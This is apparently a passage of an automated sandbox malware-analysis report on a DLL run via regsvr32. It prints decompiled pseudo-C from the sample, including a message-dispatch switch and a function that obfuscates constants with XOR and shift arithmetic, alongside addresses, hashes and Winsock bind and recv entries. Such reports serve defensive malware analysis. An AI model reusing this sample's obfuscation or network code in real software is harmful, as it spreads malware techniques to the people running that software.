											case 9:
												goto L103;
											case 0xa:
												_push(__esi);
												_push(E10022961(__ebx, __ecx, __edi, __esi, __eflags));
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L61:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L49:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0xb:
												_push(__esi);
												goto L87;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L90;
											case 0xd:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0xe:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L81;
											case 0xf:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L81;
											case 0x10:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L95;
											case 0x11:
												_push(E10019C16(__ebx, __ecx, __ebp, __esi));
												L87:
												_push( *(__ebp + 0xc));
												goto L88;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0x13:
												_push(E10019C16(__ebx, __ecx, __ebp,  *(__ebp + 0xc)));
												_push(E10019C16(__ebx, __ecx, __ebp, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
												__eax = 0 |  *((intOrPtr*)(__edi + 0x20)) == __esi;
												goto L93;
											case 0x14:
												_push( *(__ebp + 0xc));
												__eax = E10024520(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x15:
												_push( *(__ebp + 0xc));
												__eax = E10022961(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x16:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												_push(__si);
												_push( *(__ebp + 0xc));
												__eax = E10022961(__ebx, __ecx, __edi, __esi, __eflags);
												goto L93;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L75;
											case 0x18:
												_push(__esi);
												L75:
												__eax = E10019C16(__ebx, __ecx, __ebp);
												L76:
												_push(__eax);
												goto L90;
											case 0x19:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L79;
											case 0x1a:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L79:
												_push(__eax);
												__eax = E10019C16(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L93;
											case 0x1b:
												_push(__esi);
												__eax = E10019C16(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												L81:
												_push(__eax);
												goto L88;
											case 0x1c:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E10019C16(__ebx, __ecx, __ebp, __esi);
												goto L92;
											case 0x1d:
												__ecx =  *(__ebp + 0xc);
												__edx = __cx;
												__ecx =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax - 0x2a;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												 *(__ebp + 0xc) = __ecx;
												if(__eax != 0x2a) {
													_push(__ecx);
													_push(__edx);
													L88:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L106;
												}
												_push(E10019C16(__ebx, __ecx, __ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L96;
											case 0x1e:
												_push(__esi);
												L90:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L42:
												_push(__eax);
												goto L104;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L92:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L93:
												_push(__eax);
												goto L96;
											case 0x22:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L95:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L96:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												__eflags = _t185;
												if(_t185 != 0) {
													goto L106;
												}
												goto L39;
											case 0x24:
												goto L106;
											case 0x25:
												__ecx = __edi;
												__eax =  *__ebx();
												__eflags = __eax;
												 *(__ebp - 0x10) = __eax;
												if(__eax == 0) {
													goto L106;
												}
												L39:
												 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
												E1001887B(_t225 - 0x14);
												_t163 = 0;
												__eflags = 0;
												goto L40;
										}
									}
									_t170 =  *(_t225 - 0x18);
									_t58 =  &(_t170[1]);
									 *_t58 = _t170[1] & 0x00000000;
									__eflags =  *_t58;
									E1001887B(_t225 - 0x14);
									goto L39;
								}
								_t173 = _t194;
								__eflags =  *(_t225 + 0x10) - _t173[2];
								if( *(_t225 + 0x10) != _t173[2]) {
									goto L25;
								}
								_t196 = _t173[1];
								 *(_t225 + 0x10) = _t196;
								E1001887B(_t225 - 0x14);
								__eflags = _t196;
								if(_t196 == 0) {
									goto L39;
								}
								__eflags =  *(_t225 + 8) - 0xc000;
								if( *(_t225 + 8) < 0xc000) {
									goto L29;
								}
								goto L102;
							}
							__eflags =  *(_t147 + 0x74);
							if( *(_t147 + 0x74) <= 0) {
								goto L20;
							}
							__eflags = _t189 - 0x200;
							if(_t189 < 0x200) {
								L16:
								__eflags = _t189 - 0x100;
								if(_t189 < 0x100) {
									L18:
									__eflags = _t189 - 0x281 - 0x10;
									if(_t189 - 0x281 > 0x10) {
										goto L20;
									}
									L19:
									_t177 =  *((intOrPtr*)( *( *(_t222 + 0x4c)) + 0x94))(_t189,  *((intOrPtr*)(_t225 + 0xc)), _t224, _t225 - 0x10);
									__eflags = _t177;
									if(_t177 != 0) {
										goto L106;
									}
									goto L20;
								}
								__eflags = _t189 - 0x10f;
								if(_t189 <= 0x10f) {
									goto L19;
								}
								goto L18;
							}
							__eflags = _t189 - 0x209;
							if(_t189 <= 0x209) {
								goto L19;
							}
							goto L16;
						} else {
							_t181 = E1001B3E9(_t189, _t222, _t222, _t224, _t224 >> 0x10);
							__eflags = _t181;
							if(_t181 != 0) {
								L2:
								 *((intOrPtr*)(_t225 - 0x10)) = 1;
								L106:
								_t160 =  *((intOrPtr*)(_t225 + 0x14));
								if(_t160 != 0) {
									 *_t160 =  *((intOrPtr*)(_t225 - 0x10));
								}
								 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
								E1001887B(_t225 - 0x14);
								_t163 = 1;
								L40:
								return E1003D2BE(_t163);
							}
							goto L12;
						}
					}
					_t217 =  *(_t225 + 0x10);
					__eflags =  *_t217;
					if( *_t217 == 0) {
						goto L39;
					}
					_push(_t225 - 0x10);
					_push(_t217);
					_push( *((intOrPtr*)(_t225 + 0xc)));
					_t185 =  *((intOrPtr*)( *__ecx + 0xec))();
					goto L6;
				}
				_push( *(_t225 + 0x10));
				_push( *((intOrPtr*)(_t225 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
					goto L39;
				}
				goto L2;
			}

























                                                                                                                0x1001b9a4
                                                                                                                0x1001b9a4
                                                                                                                0x1001b9ab
                                                                                                                0x1001b9b0
                                                                                                                0x1001b9b4
                                                                                                                0x1001b9b7
                                                                                                                0x1001b9be
                                                                                                                0x1001b9c7
                                                                                                                0x1001b9ca
                                                                                                                0x1001b9ee
                                                                                                                0x1001b9f1
                                                                                                                0x1001ba1d
                                                                                                                0x1001ba20
                                                                                                                0x1001ba23
                                                                                                                0x1001ba30
                                                                                                                0x1001ba30
                                                                                                                0x1001ba35
                                                                                                                0x1001ba38
                                                                                                                0x1001ba4e
                                                                                                                0x1001ba4e
                                                                                                                0x1001ba51
                                                                                                                0x1001ba53
                                                                                                                0x1001baa2
                                                                                                                0x1001baa6
                                                                                                                0x1001bab3
                                                                                                                0x1001babc
                                                                                                                0x1001bac7
                                                                                                                0x1001bacd
                                                                                                                0x1001bacf
                                                                                                                0x1001bad2
                                                                                                                0x1001bb02
                                                                                                                0x1001bb02
                                                                                                                0x1001bb05
                                                                                                                0x1001bb0b
                                                                                                                0x1001bb0d
                                                                                                                0x1001bb9c
                                                                                                                0x1001bb9c
                                                                                                                0x1001bb9f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bb15
                                                                                                                0x1001bb1c
                                                                                                                0x1001bb1e
                                                                                                                0x1001bb20
                                                                                                                0x1001bb64
                                                                                                                0x1001bb69
                                                                                                                0x1001bb87
                                                                                                                0x1001bb8c
                                                                                                                0x1001bb8e
                                                                                                                0x1001bb90
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bb72
                                                                                                                0x1001bb74
                                                                                                                0x1001be85
                                                                                                                0x1001be88
                                                                                                                0x1001be8d
                                                                                                                0x1001be8d
                                                                                                                0x1001be90
                                                                                                                0x1001be90
                                                                                                                0x1001be91
                                                                                                                0x1001be94
                                                                                                                0x1001be96
                                                                                                                0x1001be98
                                                                                                                0x1001be98
                                                                                                                0x00000000
                                                                                                                0x1001be98
                                                                                                                0x1001bb7a
                                                                                                                0x1001bb7c
                                                                                                                0x1001bb7e
                                                                                                                0x1001bb83
                                                                                                                0x1001bb83
                                                                                                                0x1001bb86
                                                                                                                0x1001bb86
                                                                                                                0x1001bb92
                                                                                                                0x1001bb95
                                                                                                                0x1001bb97
                                                                                                                0x1001bb99
                                                                                                                0x00000000
                                                                                                                0x1001bb99
                                                                                                                0x1001bb22
                                                                                                                0x1001bb25
                                                                                                                0x1001bb28
                                                                                                                0x1001bb2d
                                                                                                                0x1001bb2f
                                                                                                                0x1001bb32
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bb37
                                                                                                                0x1001bb3d
                                                                                                                0x1001bb42
                                                                                                                0x1001bb4b
                                                                                                                0x1001bb4e
                                                                                                                0x1001bb51
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bb57
                                                                                                                0x00000000
                                                                                                                0x1001bbda
                                                                                                                0x1001bbe2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bbec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bc06
                                                                                                                0x1001bc08
                                                                                                                0x1001bc08
                                                                                                                0x1001bc0b
                                                                                                                0x1001bc0c
                                                                                                                0x1001bc0f
                                                                                                                0x1001bc13
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bc22
                                                                                                                0x1001bc26
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bc2d
                                                                                                                0x1001bbe3
                                                                                                                0x1001bbe3
                                                                                                                0x1001bbe5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bc30
                                                                                                                0x1001bc38
                                                                                                                0x1001bc3b
                                                                                                                0x1001bc3e
                                                                                                                0x1001bc42
                                                                                                                0x1001bc45
                                                                                                                0x1001bc4a
                                                                                                                0x1001bc4c
                                                                                                                0x1001bc50
                                                                                                                0x1001bc54
                                                                                                                0x1001bc57
                                                                                                                0x1001bc5c
                                                                                                                0x1001bc5e
                                                                                                                0x1001bc60
                                                                                                                0x1001bc63
                                                                                                                0x1001bc65
                                                                                                                0x1001bc6a
                                                                                                                0x1001bc6d
                                                                                                                0x1001bc72
                                                                                                                0x1001bc74
                                                                                                                0x1001bc76
                                                                                                                0x1001bc76
                                                                                                                0x1001bc74
                                                                                                                0x1001bc79
                                                                                                                0x1001bc79
                                                                                                                0x1001bc7c
                                                                                                                0x1001bc7d
                                                                                                                0x1001bc7e
                                                                                                                0x1001bc81
                                                                                                                0x1001bc82
                                                                                                                0x1001bc84
                                                                                                                0x1001bc86
                                                                                                                0x1001bc8a
                                                                                                                0x1001bc8e
                                                                                                                0x1001bc91
                                                                                                                0x1001bc94
                                                                                                                0x1001bc98
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bc9f
                                                                                                                0x1001bca7
                                                                                                                0x1001bcaa
                                                                                                                0x1001bcad
                                                                                                                0x1001bcb0
                                                                                                                0x1001bcb3
                                                                                                                0x1001bcb4
                                                                                                                0x1001bcb6
                                                                                                                0x1001bcba
                                                                                                                0x1001bcbc
                                                                                                                0x1001bcbc
                                                                                                                0x1001bcbc
                                                                                                                0x1001bcc0
                                                                                                                0x1001bcc3
                                                                                                                0x1001bcc3
                                                                                                                0x1001bcc6
                                                                                                                0x1001bcca
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bcd4
                                                                                                                0x1001bcd7
                                                                                                                0x1001bcd7
                                                                                                                0x1001bcda
                                                                                                                0x1001bcdc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bcee
                                                                                                                0x1001bcf1
                                                                                                                0x1001bcf2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bcfb
                                                                                                                0x1001bd01
                                                                                                                0x1001bd02
                                                                                                                0x1001bd05
                                                                                                                0x1001bce1
                                                                                                                0x1001bce1
                                                                                                                0x1001bce2
                                                                                                                0x1001bc18
                                                                                                                0x1001bc18
                                                                                                                0x1001bc19
                                                                                                                0x1001bc1b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001be08
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bd13
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bd0a
                                                                                                                0x1001bd0c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bd1e
                                                                                                                0x1001bd21
                                                                                                                0x1001bd22
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bd2d
                                                                                                                0x1001bd30
                                                                                                                0x1001bd33
                                                                                                                0x1001bd34
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bd41
                                                                                                                0x1001bd42
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bc00
                                                                                                                0x1001be09
                                                                                                                0x1001be09
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bbf1
                                                                                                                0x1001bbf3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bd52
                                                                                                                0x1001bd59
                                                                                                                0x1001bd5a
                                                                                                                0x1001bd5c
                                                                                                                0x1001bd5f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bd67
                                                                                                                0x1001bd6a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bd71
                                                                                                                0x1001bd74
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bd7d
                                                                                                                0x1001bd80
                                                                                                                0x1001bd83
                                                                                                                0x1001bd84
                                                                                                                0x1001bd87
                                                                                                                0x1001bd88
                                                                                                                0x1001bd8b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bd95
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bd9a
                                                                                                                0x1001bd9b
                                                                                                                0x1001bd9b
                                                                                                                0x1001bda0
                                                                                                                0x1001bda0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bda8
                                                                                                                0x1001bda9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bdae
                                                                                                                0x1001bdb1
                                                                                                                0x1001bdb4
                                                                                                                0x1001bdb7
                                                                                                                0x1001bdb8
                                                                                                                0x1001bdb8
                                                                                                                0x1001bdbc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bdc3
                                                                                                                0x1001bdc7
                                                                                                                0x1001bdcc
                                                                                                                0x1001bdcc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bdd2
                                                                                                                0x1001bdd5
                                                                                                                0x1001bdd7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bdde
                                                                                                                0x1001bde1
                                                                                                                0x1001bde4
                                                                                                                0x1001bde7
                                                                                                                0x1001bdea
                                                                                                                0x1001bded
                                                                                                                0x1001bdf0
                                                                                                                0x1001bdf3
                                                                                                                0x1001be04
                                                                                                                0x1001be05
                                                                                                                0x1001be0c
                                                                                                                0x1001be0c
                                                                                                                0x1001be0e
                                                                                                                0x00000000
                                                                                                                0x1001be0e
                                                                                                                0x1001bdfb
                                                                                                                0x1001bdfc
                                                                                                                0x1001bdff
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001be15
                                                                                                                0x1001be16
                                                                                                                0x1001be16
                                                                                                                0x1001be18
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001be3f
                                                                                                                0x1001be40
                                                                                                                0x1001be43
                                                                                                                0x1001be45
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bbca
                                                                                                                0x1001bbcd
                                                                                                                0x1001bbd0
                                                                                                                0x1001bbd3
                                                                                                                0x1001bbd4
                                                                                                                0x1001bbd4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001be1c
                                                                                                                0x1001be1f
                                                                                                                0x1001be20
                                                                                                                0x1001be20
                                                                                                                0x1001be23
                                                                                                                0x1001be23
                                                                                                                0x1001be24
                                                                                                                0x1001be28
                                                                                                                0x1001be28
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001be2b
                                                                                                                0x1001be2e
                                                                                                                0x1001be31
                                                                                                                0x1001be34
                                                                                                                0x1001be35
                                                                                                                0x1001be35
                                                                                                                0x1001be36
                                                                                                                0x1001be39
                                                                                                                0x1001be39
                                                                                                                0x1001be3b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001be4c
                                                                                                                0x1001be4f
                                                                                                                0x1001be52
                                                                                                                0x1001be55
                                                                                                                0x1001be56
                                                                                                                0x1001be5a
                                                                                                                0x1001be5d
                                                                                                                0x1001be5e
                                                                                                                0x1001be62
                                                                                                                0x1001be63
                                                                                                                0x1001be65
                                                                                                                0x1001be67
                                                                                                                0x1001ba10
                                                                                                                0x1001ba10
                                                                                                                0x1001ba12
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001be6f
                                                                                                                0x1001be71
                                                                                                                0x1001be73
                                                                                                                0x1001be75
                                                                                                                0x1001be78
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bbb4
                                                                                                                0x1001bbb4
                                                                                                                0x1001bbbb
                                                                                                                0x1001bbc0
                                                                                                                0x1001bbc0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bb57
                                                                                                                0x1001bba5
                                                                                                                0x1001bba8
                                                                                                                0x1001bba8
                                                                                                                0x1001bba8
                                                                                                                0x1001bbaf
                                                                                                                0x00000000
                                                                                                                0x1001bbaf
                                                                                                                0x1001bad7
                                                                                                                0x1001bad9
                                                                                                                0x1001badc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bade
                                                                                                                0x1001bae4
                                                                                                                0x1001bae7
                                                                                                                0x1001baec
                                                                                                                0x1001baee
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001baf4
                                                                                                                0x1001bafb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bafd
                                                                                                                0x1001ba55
                                                                                                                0x1001ba59
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001ba5b
                                                                                                                0x1001ba61
                                                                                                                0x1001ba6b
                                                                                                                0x1001ba6b
                                                                                                                0x1001ba71
                                                                                                                0x1001ba7b
                                                                                                                0x1001ba81
                                                                                                                0x1001ba84
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001ba86
                                                                                                                0x1001ba94
                                                                                                                0x1001ba9a
                                                                                                                0x1001ba9c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001ba9c
                                                                                                                0x1001ba73
                                                                                                                0x1001ba79
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001ba79
                                                                                                                0x1001ba63
                                                                                                                0x1001ba69
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001ba3a
                                                                                                                0x1001ba45
                                                                                                                0x1001ba4a
                                                                                                                0x1001ba4c
                                                                                                                0x1001b9e2
                                                                                                                0x1001b9e2
                                                                                                                0x1001be9b
                                                                                                                0x1001be9b
                                                                                                                0x1001bea0
                                                                                                                0x1001bea5
                                                                                                                0x1001bea5
                                                                                                                0x1001bea7
                                                                                                                0x1001beae
                                                                                                                0x1001beb5
                                                                                                                0x1001bbc2
                                                                                                                0x1001bbc7
                                                                                                                0x1001bbc7
                                                                                                                0x00000000
                                                                                                                0x1001ba4c
                                                                                                                0x1001ba38
                                                                                                                0x1001b9f3
                                                                                                                0x1001b9f6
                                                                                                                0x1001b9f8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001ba03
                                                                                                                0x1001ba04
                                                                                                                0x1001ba05
                                                                                                                0x1001ba0a
                                                                                                                0x00000000
                                                                                                                0x1001ba0a
                                                                                                                0x1001b9cc
                                                                                                                0x1001b9d1
                                                                                                                0x1001b9dc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 431132790-0
                                                                                                                • Opcode ID: 6cbbc01dc4adf3a70d768560abebe0fbe013057f60a2a8bdd2383814aab4216d
                                                                                                                • Instruction ID: 3708e65b73b09b6269c1c34c502a6710bbcb785bcf4e38c95b2407479d08a34b
                                                                                                                • Opcode Fuzzy Hash: 6cbbc01dc4adf3a70d768560abebe0fbe013057f60a2a8bdd2383814aab4216d
                                                                                                                • Instruction Fuzzy Hash: 9CF18C7460460AEFDB14CF64C8C0AAE7BF9EF04354F508519F915AF292DB74EA80DBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002847B Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • bind.WS2_32(?,00000002,00000002), ref: 10028486
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: bind
                                                                                                                • String ID:
                                                                                                                • API String ID: 1187836755-0
                                                                                                                • Opcode ID: c57f1ed6be80cf4bc494b7a969765500a5a1b7b5f519a762fe36a3f7551b516e
                                                                                                                • Instruction ID: ebbd286c4b1c4735eb0aa15a62bef6ba0f25a31a82777360077351f96c12b584
                                                                                                                • Opcode Fuzzy Hash: c57f1ed6be80cf4bc494b7a969765500a5a1b7b5f519a762fe36a3f7551b516e
                                                                                                                • Instruction Fuzzy Hash: 2EC04C3A114111ABCB051B64DD4588EBE61AF69361B24C71DF167C50F0D732C4B1EB01
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002818E Relevance: 1.5, APIs: 1, Instructions: 6networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • recv.WS2_32(?,00000000,00000000,00000000), ref: 1002819D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: recv
                                                                                                                • String ID:
                                                                                                                • API String ID: 1507349165-0
                                                                                                                • Opcode ID: a5a86babedb9355488aaefd23d6dec7be01135ec1cb17d822240c28265fd1b19
                                                                                                                • Instruction ID: feae7f3cdd693caa6732826660bb39d2d4a538c540f0ac5a15eeb299582c9ee6
                                                                                                                • Opcode Fuzzy Hash: a5a86babedb9355488aaefd23d6dec7be01135ec1cb17d822240c28265fd1b19
                                                                                                                • Instruction Fuzzy Hash: E7C0483A008200FFCB024B80DD14C0ABFA2AB98320F00C808F2A800030C3338021EB02
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B35A3 Relevance: 1.5, Strings: 1, Instructions: 211COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E001B35A3(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				unsigned int _v108;
				intOrPtr* _t203;
				intOrPtr _t216;
				intOrPtr _t217;
				signed int _t219;
				intOrPtr _t222;
				intOrPtr _t223;
				signed int _t235;
				signed int _t236;
				intOrPtr _t237;
				void* _t239;
				signed int _t240;
				intOrPtr _t241;
				intOrPtr _t242;
				unsigned int* _t243;
				unsigned int* _t244;

				_t217 = __ecx;
				_t243 =  &_v108;
				_v8 = __edx;
				_v20 = __ecx;
				_v72 = 0x18176e;
				_v72 = _v72 + 0xffff02a3;
				_v72 = _v72 * 0x28;
				_t239 = 0xcc5ade;
				_v72 = _v72 ^ 0x039c12a8;
				_v60 = 0x6d2ba0;
				_v60 = _v60 ^ 0xc8285a6b;
				_v60 = _v60 ^ 0xc845d405;
				_v64 = 0xbfee22;
				_v64 = _v64 << 6;
				_v64 = _v64 ^ 0x2ff37afc;
				_v68 = 0xb8022b;
				_v68 = _v68 >> 3;
				_v68 = _v68 ^ 0x00180df7;
				_v108 = 0x514a92;
				_v108 = _v108 ^ 0xa60b3804;
				_v108 = _v108 | 0x7264c8f2;
				_v108 = _v108 >> 9;
				_v108 = _v108 ^ 0x007f5af6;
				_v104 = 0x9f02d8;
				_v104 = _v104 + 0x80eb;
				_v104 = _v104 | 0x2da237b4;
				_v104 = _v104 ^ 0xf9b80a62;
				_v104 = _v104 ^ 0xd40cea05;
				_v48 = 0x41095b;
				_v48 = _v48 ^ 0xe7cb629b;
				_v48 = _v48 ^ 0xe789d2b9;
				_v52 = 0xe0dbae;
				_v52 = _v52 + 0xffffe101;
				_v52 = _v52 ^ 0x00eb1eca;
				_v56 = 0xdb8bf1;
				_t235 = 0x62;
				_v24 = _v24 & 0x00000000;
				_v56 = _v56 / _t235;
				_v56 = _v56 ^ 0x000d7cf8;
				_v92 = 0x30af14;
				_v92 = _v92 + 0x9d27;
				_v92 = _v92 + 0xfffff8f2;
				_v92 = _v92 << 0xe;
